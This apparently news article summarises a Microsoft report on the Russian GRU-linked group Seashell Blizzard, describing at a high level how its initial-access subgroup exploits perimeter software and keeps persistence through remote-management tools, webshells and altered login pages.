Russian state cyber-actor Seashell Blizzard has engaged a specialist initial access subgroup to increase its ability to compromise high-value targets globally, according to a new Microsoft report.
The multiyear operation has enabled Seashell Blizzard to expand its reach and achieve persistent access in global targets across sensitive sectors.
These target sectors include energy, oil and gas, telecommunications, shipping, arms manufacturing and governments.
Previously, initial access efforts by Seashell Blizzard have predominantly focused on Ukraine and other parts of Eastern Europe. More recently, targets are now located across a wide range of geographies, including the UK, US, Canada and Australia.
Microsoft assessed that the initial access subgroup’s scalable capabilities have been bolstered by published exploits in numerous remote access technology systems since early 2024.
These include vulnerabilities in ConnectWise ScreenConnect and Fortinet FortiClient software.
The approach is in line with Russia’s evolving strategic objectives, with Kremlin-backed threat actors targeting international organizations that are either geopolitically significant or provide military and/or political support to Ukraine since April 2022.
“Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term,” the researchers wrote.
Seashell Blizzard, which has been active since at least 2013, conducts global activities on behalf of Russian Military Intelligence Unit 74455 (GRU).
Its operations range from espionage and cyber-enabled disruptions, usually in the form of destructive attacks and manipulation of industrial control systems (ICS).
Seashell Blizzard Subgroup Initial Access Techniques
The initial access subgroup uses distinct exploits, tooling, infrastructure and late-stage methods used to establish persistence for the broader Seashell Blizzard group, Microsoft said.
It discovers vulnerabilities in Internet-facing infrastructure through direct scanning and the use of third-party internet scanning services and knowledge repositories.
To date, the subgroup has exploited at least eight vulnerabilities in server infrastructure typically found on network perimeters of small office/home office (SOHO) and enterprise networks.
In nearly all cases of successful exploitation, the subgroup carried out measures to establish long-term persistence on affected systems. These revolve around three specific exploit patterns:
- The deployment of remote management and monitoring (RMM) suites to achieve persistence and command and control (C2). The use of RMM software enables the actors retain critical C2 functions while masquerading as a legitimate utility, reducing the chance of detection. This novel technique was first observed in early 2024.
- Using webshells to maintain footholds and achieve the ability to execute commands necessary to deploy secondary tooling to assist lateral movement. This technique began in mid-2024 and remains the subgroup’s predominant persistence method.
- Malicious modifications to network resources including Outlook Web Access (OWA) sign-in pages and DNS configurations. This enables the subgroup to passively gather relevant network credentials to widen its access to networks. The approach is used for targeted operations where the initial access subgroup is likely seeking network access and has been observed since late 2021.
The broader Seashell Blizzard group is able to use the access gained by the subgroup to deploy secondary tools to help credential acquisition, data exfiltration and upload of custom utilities to facilitate more robust access to compromised systems.
Microsoft expects the initial access subgroup to continue to innovate new horizontally scalable techniques to compromise networks both in Ukraine and globally in support of Russia’s war objectives and evolving national priorities.
